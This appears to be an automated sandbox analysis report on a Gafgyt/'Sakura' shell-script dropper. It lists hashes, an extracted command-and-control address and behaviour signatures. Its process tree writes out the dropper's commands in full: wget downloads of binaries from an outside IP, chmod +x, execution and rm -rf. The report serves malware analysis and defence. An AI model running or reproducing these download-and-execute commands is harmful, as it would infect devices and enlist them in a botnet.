Analysis
-
max time kernel
149s -
max time network
160s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
08-01-2025 02:51
Static task
static1
Behavioral task
behavioral1
Sample
98ce9f05d20d7511e19c010b550230e094f5ecf2be00cc2630c45c3a4c19e135.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
98ce9f05d20d7511e19c010b550230e094f5ecf2be00cc2630c45c3a4c19e135.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
98ce9f05d20d7511e19c010b550230e094f5ecf2be00cc2630c45c3a4c19e135.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
98ce9f05d20d7511e19c010b550230e094f5ecf2be00cc2630c45c3a4c19e135.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
98ce9f05d20d7511e19c010b550230e094f5ecf2be00cc2630c45c3a4c19e135.sh
-
Size
2KB
-
MD5
99676bbb4d53d0ace58166113e3bb990
-
SHA1
7b36c64784a672ef00b4edb9caa89bc8315a3a72
-
SHA256
98ce9f05d20d7511e19c010b550230e094f5ecf2be00cc2630c45c3a4c19e135
-
SHA512
b8170b04f930e6824cef2406f67f579742140f66f57cb34ecfb96891291cd66589843dddd04b4d9680f2cbe3c68f13fc233e92483caa56ea5bfb43abf9fdd479
Malware Config
Extracted
gafgyt
38.134.189.10:12345
Signatures
-
Detected Gafgyt variant 11 IoCs
resource yara_rule behavioral2/files/fstream-1.dat family_gafgyt behavioral2/files/fstream-2.dat family_gafgyt behavioral2/files/fstream-3.dat family_gafgyt behavioral2/files/fstream-4.dat family_gafgyt behavioral2/files/fstream-5.dat family_gafgyt behavioral2/files/fstream-6.dat family_gafgyt behavioral2/files/fstream-7.dat family_gafgyt behavioral2/files/fstream-8.dat family_gafgyt behavioral2/files/fstream-9.dat family_gafgyt behavioral2/files/fstream-10.dat family_gafgyt behavioral2/files/fstream-13.dat family_gafgyt -
Gafgyt family
-
File and Directory Permissions Modification 1 TTPs 13 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 744 chmod 787 chmod 812 chmod 792 chmod 670 chmod 685 chmod 705 chmod 730 chmod 765 chmod 776 chmod 781 chmod 798 chmod 806 chmod -
Executes dropped EXE 13 IoCs
ioc pid Process /tmp/m-i.p-s.Sakura 671 m-i.p-s.Sakura /tmp/m-p.s-l.Sakura 686 m-p.s-l.Sakura /tmp/s-h.4-.Sakura 706 s-h.4-.Sakura /tmp/x-8.6-.Sakura 731 x-8.6-.Sakura /tmp/a-r.m-6.Sakura 745 a-r.m-6.Sakura /tmp/x-3.2-.Sakura 767 x-3.2-.Sakura /tmp/a-r.m-7.Sakura 777 a-r.m-7.Sakura /tmp/p-p.c-.Sakura 782 p-p.c-.Sakura /tmp/i-5.8-6.Sakura 788 i-5.8-6.Sakura /tmp/m-6.8-k.Sakura 793 m-6.8-k.Sakura /tmp/p-p.c-.Sakura 799 p-p.c-.Sakura /tmp/a-r.m-4.Sakura 807 a-r.m-4.Sakura /tmp/a-r.m-5.Sakura 813 a-r.m-5.Sakura -
Reads system routing table 1 TTPs 6 IoCs
Gets active network interfaces from /proc virtual filesystem.
description ioc Process File opened for reading /proc/net/route a-r.m-5.Sakura File opened for reading /proc/net/route a-r.m-6.Sakura File opened for reading /proc/net/route p-p.c-.Sakura File opened for reading /proc/net/route m-6.8-k.Sakura File opened for reading /proc/net/route p-p.c-.Sakura File opened for reading /proc/net/route a-r.m-4.Sakura -
Reads system network configuration 1 TTPs 6 IoCs
Uses contents of /proc filesystem to enumerate network settings.
description ioc Process File opened for reading /proc/net/route a-r.m-6.Sakura File opened for reading /proc/net/route p-p.c-.Sakura File opened for reading /proc/net/route m-6.8-k.Sakura File opened for reading /proc/net/route p-p.c-.Sakura File opened for reading /proc/net/route a-r.m-4.Sakura File opened for reading /proc/net/route a-r.m-5.Sakura -
Writes file to tmp directory 13 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/s-h.4-.Sakura wget File opened for modification /tmp/a-r.m-6.Sakura wget File opened for modification /tmp/a-r.m-7.Sakura wget File opened for modification /tmp/i-5.8-6.Sakura wget File opened for modification /tmp/m-6.8-k.Sakura wget File opened for modification /tmp/a-r.m-4.Sakura wget File opened for modification /tmp/a-r.m-5.Sakura wget File opened for modification /tmp/m-i.p-s.Sakura wget File opened for modification /tmp/m-p.s-l.Sakura wget File opened for modification /tmp/x-8.6-.Sakura wget File opened for modification /tmp/x-3.2-.Sakura wget File opened for modification /tmp/p-p.c-.Sakura wget File opened for modification /tmp/p-p.c-.Sakura wget
Processes
-
/tmp/98ce9f05d20d7511e19c010b550230e094f5ecf2be00cc2630c45c3a4c19e135.sh/tmp/98ce9f05d20d7511e19c010b550230e094f5ecf2be00cc2630c45c3a4c19e135.sh1⤵PID:639
-
/usr/bin/wgetwget http://38.134.189.10/m-i.p-s.Sakura2⤵
- Writes file to tmp directory
PID:642
-
-
/bin/chmodchmod +x m-i.p-s.Sakura2⤵
- File and Directory Permissions Modification
PID:670
-
-
/tmp/m-i.p-s.Sakura./m-i.p-s.Sakura2⤵
- Executes dropped EXE
PID:671
-
-
/bin/rmrm -rf m-i.p-s.Sakura2⤵PID:673
-
-
/usr/bin/wgetwget http://38.134.189.10/m-p.s-l.Sakura2⤵
- Writes file to tmp directory
PID:674
-
-
/bin/chmodchmod +x m-p.s-l.Sakura2⤵
- File and Directory Permissions Modification
PID:685
-
-
/tmp/m-p.s-l.Sakura./m-p.s-l.Sakura2⤵
- Executes dropped EXE
PID:686
-
-
/bin/rmrm -rf m-p.s-l.Sakura2⤵PID:688
-
-
/usr/bin/wgetwget http://38.134.189.10/s-h.4-.Sakura2⤵
- Writes file to tmp directory
PID:690
-
-
/bin/chmodchmod +x s-h.4-.Sakura2⤵
- File and Directory Permissions Modification
PID:705
-
-
/tmp/s-h.4-.Sakura./s-h.4-.Sakura2⤵
- Executes dropped EXE
PID:706
-
-
/bin/rmrm -rf s-h.4-.Sakura2⤵PID:709
-
-
/usr/bin/wgetwget http://38.134.189.10/x-8.6-.Sakura2⤵
- Writes file to tmp directory
PID:710
-
-
/bin/chmodchmod +x x-8.6-.Sakura2⤵
- File and Directory Permissions Modification
PID:730
-
-
/tmp/x-8.6-.Sakura./x-8.6-.Sakura2⤵
- Executes dropped EXE
PID:731
-
-
/bin/rmrm -rf x-8.6-.Sakura2⤵PID:733
-
-
/usr/bin/wgetwget http://38.134.189.10/a-r.m-6.Sakura2⤵
- Writes file to tmp directory
PID:734
-
-
/bin/chmodchmod +x a-r.m-6.Sakura2⤵
- File and Directory Permissions Modification
PID:744
-
-
/tmp/a-r.m-6.Sakura./a-r.m-6.Sakura2⤵
- Executes dropped EXE
- Reads system routing table
- Reads system network configuration
PID:745
-
-
/bin/rmrm -rf a-r.m-6.Sakura2⤵PID:749
-
-
/usr/bin/wgetwget http://38.134.189.10/x-3.2-.Sakura2⤵
- Writes file to tmp directory
PID:750
-
-
/bin/chmodchmod +x x-3.2-.Sakura2⤵
- File and Directory Permissions Modification
PID:765
-
-
/tmp/x-3.2-.Sakura./x-3.2-.Sakura2⤵
- Executes dropped EXE
PID:767
-
-
/bin/rmrm -rf x-3.2-.Sakura2⤵PID:770
-
-
/usr/bin/wgetwget http://38.134.189.10/a-r.m-7.Sakura2⤵
- Writes file to tmp directory
PID:771
-
-
/bin/chmodchmod +x a-r.m-7.Sakura2⤵
- File and Directory Permissions Modification
PID:776
-
-
/tmp/a-r.m-7.Sakura./a-r.m-7.Sakura2⤵
- Executes dropped EXE
PID:777
-
-
/bin/rmrm -rf a-r.m-7.Sakura2⤵PID:779
-
-
/usr/bin/wgetwget http://38.134.189.10/p-p.c-.Sakura2⤵
- Writes file to tmp directory
PID:780
-
-
/bin/chmodchmod +x p-p.c-.Sakura2⤵
- File and Directory Permissions Modification
PID:781
-
-
/tmp/p-p.c-.Sakura./p-p.c-.Sakura2⤵
- Executes dropped EXE
- Reads system routing table
- Reads system network configuration
PID:782
-
-
/bin/rmrm -rf p-p.c-.Sakura2⤵PID:785
-
-
/usr/bin/wgetwget http://38.134.189.10/i-5.8-6.Sakura2⤵
- Writes file to tmp directory
PID:786
-
-
/bin/chmodchmod +x i-5.8-6.Sakura2⤵
- File and Directory Permissions Modification
PID:787
-
-
/tmp/i-5.8-6.Sakura./i-5.8-6.Sakura2⤵
- Executes dropped EXE
PID:788
-
-
/bin/rmrm -rf i-5.8-6.Sakura2⤵PID:790
-
-
/usr/bin/wgetwget http://38.134.189.10/m-6.8-k.Sakura2⤵
- Writes file to tmp directory
PID:791
-
-
/bin/chmodchmod +x m-6.8-k.Sakura2⤵
- File and Directory Permissions Modification
PID:792
-
-
/tmp/m-6.8-k.Sakura./m-6.8-k.Sakura2⤵
- Executes dropped EXE
- Reads system routing table
- Reads system network configuration
PID:793
-
-
/bin/rmrm -rf m-6.8-k.Sakura2⤵PID:796
-
-
/usr/bin/wgetwget http://38.134.189.10/p-p.c-.Sakura2⤵
- Writes file to tmp directory
PID:797
-
-
/bin/chmodchmod +x p-p.c-.Sakura2⤵
- File and Directory Permissions Modification
PID:798
-
-
/tmp/p-p.c-.Sakura./p-p.c-.Sakura2⤵
- Executes dropped EXE
- Reads system routing table
- Reads system network configuration
PID:799
-
-
/bin/rmrm -rf p-p.c-.Sakura2⤵PID:802
-
-
/usr/bin/wgetwget http://38.134.189.10/a-r.m-4.Sakura2⤵
- Writes file to tmp directory
PID:803
-
-
/bin/chmodchmod +x a-r.m-4.Sakura2⤵
- File and Directory Permissions Modification
PID:806
-
-
/tmp/a-r.m-4.Sakura./a-r.m-4.Sakura2⤵
- Executes dropped EXE
- Reads system routing table
- Reads system network configuration
PID:807
-
-
/bin/rmrm -rf a-r.m-4.Sakura2⤵PID:810
-
-
/usr/bin/wgetwget http://38.134.189.10/a-r.m-5.Sakura2⤵
- Writes file to tmp directory
PID:811
-
-
/bin/chmodchmod +x a-r.m-5.Sakura2⤵
- File and Directory Permissions Modification
PID:812
-
-
/tmp/a-r.m-5.Sakura./a-r.m-5.Sakura2⤵
- Executes dropped EXE
- Reads system routing table
- Reads system network configuration
PID:813
-
-
/bin/rmrm -rf a-r.m-5.Sakura2⤵PID:816
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
98KB
MD559eeceee8e46c0928840d591af68afeb
SHA14d521aac55eee42b51879e05ce1d3dd01156d791
SHA2569c7f296b8112c117cdde9a7afde9394615164bc9ee6c563feed02052342bb1c2
SHA512eb30c14cc1fc35b05392f1db0473dc1c52bb29874470590bf52ea925db00d5b50c146ceda731f17830599cb4d5ad6f2838b5343ecfb3cff69e86ff4a837734e7
-
Filesize
118KB
MD5fe37788544f02969c9ad949294d2cb7d
SHA11a3579a25283442ac49ee9847bbe31bb6cf2512e
SHA2565d81e73d00fe727578bdd06c35116019a926d77b05a868b3667384fd5c9b75cf
SHA512c1aa419f2cd3caf8800d21203dd8b688687b0eaae2cbb4dfe20df671b0d6a16ee6956b2c9739246381265d00161c3fa9ff493d2b82432c1770a48780bde810ca
-
Filesize
91KB
MD55c79bd499240dc6b91a3b536f108329e
SHA137b0b46cf036f5bd57a82b40ceb03216025abc61
SHA256dfb46a70a8ca259968aa7bbf10d57613dbddd125c55e71804984c19f03555e71
SHA512a34d8b6683bffc3b74e200dc459fed355549f9530b439e0579bb8f9f5a112a2d5f4ac7f8f9ba04785e4e5dc6dc7a0eb86ba3675e7a15142e1bbd03ae5f587373
-
Filesize
96KB
MD5c27645e33381978b8a7d3a6d661097ad
SHA157d97cfd0e78eaed68cc9441b97bed0da91e24c9
SHA256f59f8db748ff606c5b1b3a9d4e6384e593deae34642a960830e2284a8ab75c25
SHA512dd29e5b901d81c1bcd3fcfe9e9728551f6c0c53239750aafc1eedcbb7d62d8fb792d00563d014f36402efa412206defb6ddbc935e3d340ea548a266785645f2f
-
Filesize
156KB
MD54809c88793a97372492b29a89f59c455
SHA155cf5e0f3676308cdecbf163a69708cea6392dc5
SHA2564d57e5b4b10a8363b2fdd134bb139b44cbcd275cdd1474ea95a1a6aee8a78cd1
SHA512bead5ae01fec656f172d52027d3c94729d5501d6444bebe372f9676372e7f637bf9c13911185e180bd95906dac23003197c77acee3f5b317c7d38250057292c1
-
Filesize
123KB
MD51f4c4496d0c6887624c3c05d309f83d4
SHA1537e1b6ccba3e1d82cafda5560e5da9d4645c2d3
SHA256e6afd2316ed37511b7a97ee6d8ef484464978c49ae2637161ec4be03a600b03e
SHA512c7c98c15c738e9af21fdb2f8dfb5e60c68d6dfcc6da9ba8fa9bd635da27472246dcd37d549ad61eaf1a853a31dcbc8d9b1a7c9359992ea592d2ff811d80223cd
-
Filesize
123KB
MD5f983787db4317a7cf0ac870d959b2034
SHA111795ff7dcee3dedca4a09c4d7d2937f84dcc32e
SHA256f56c1493d63cbac0eb60fdd1061f2d1ef926958f62efdf5498b0a1d3e80aca80
SHA5121eba5b3f9e391d6ad373a5bb969eb783d2dd6e51962ec0935aaf361509fc3880aa2453d281cd6068e8c0934874a2545d057ffbbb8aeddceb4a4d232365e67cd1
-
Filesize
105KB
MD5930016afe6330d9d180f68daecf2911c
SHA1d6a3ad7fda3b36d560ebf5f9e7e249298ad97f2c
SHA256f2940ca1d83c6bfa0b94d9158a79abaffa74a86c78165d4dff6166776a95c97e
SHA512ffabbfc674cd57af3619867d3ec9265a909b9f04ab0c789e8122ff0a06590b0b06f9efa86a09814daef815b675f6bc601c92b6912b636330545e47d20a863742
-
Filesize
86KB
MD59edc866a5c36cdd5646a8ebd991a2819
SHA196e12a61911ce1766b7b53073c6a923aea042f9d
SHA25698901b5d95f179448adf28f974c4040bee998b1826c36da1386f21eff9d5e3f2
SHA512baf5142e8f104974da8e026ee45bcbd9dca8dd055d8d44831dcd79f74ed2e354ce854d075484dc2eef31a65cfd0199bcaf2d2481a4b345f4ad72c052dc202fe8
-
Filesize
83KB
MD557dee730e854b5ba734bcd395b44d012
SHA105d02dc536aeb6c21bb00cfd4e44f6d1b6588d6e
SHA256ce28907943bc46496ee99e0dfb9618644062628502fbcf5ff59be886863d60e5
SHA512cf595b0599fd6ccd95141e15088d4f2c5ee0206be2df5083eca3b5dab0595b544f03767db4f2ac032d2fb3ab91de9661d49f4e802af436c123a78186eebbe2da
-
Filesize
92KB
MD53067f41b7d4f893a49745739204d7799
SHA1dfbadc517e2c56414e14ca657cebaf414b13902d
SHA25674260f3d23a34557a1770b2a54dccde7fe8afecfdfd5615426116518780242be
SHA5124b7961bc2dbbbacdac2ac0a5d021703a3f464b19e827dbfe9dc19f280b5b848a23031d18a5b5a71c57f0b9b1b0cc48d060c4a0e0c6555130a77080a967b1ab33